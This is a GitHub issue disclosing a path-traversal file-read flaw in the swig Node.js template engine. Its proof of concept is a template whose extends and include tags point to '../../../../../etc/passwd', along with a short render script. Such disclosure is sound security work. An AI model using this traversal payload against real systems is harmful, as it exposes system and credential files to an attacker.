Security Issue: arbitrary local file read vulnerability during template rendering

official doc: 
 - <https://node-swig.github.io/swig-templates/docs/tags/#include>
 - <https://node-swig.github.io/swig-templates/docs/tags/#extends>

poc:
```
1.html
{% extends '../../../../../etc/passwd' %}
{% include '../../../../../etc/passwd' %}
```

```javascript
// run.js
var swig = require('swig');
var output = swig.renderFile('/Users/bytedance/Desktop/swig/tpl.html');
console.log(output);
```

output:
![m1-133941_byZ4O5](http://cdn2.pic.y1ng.vip/uPic/2023/02/01/m1-133941_byZ4O5.png)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Security Issue: arbitrary local file read vulnerability during template rendering #88

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Security Issue: arbitrary local file read vulnerability during template rendering #88

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions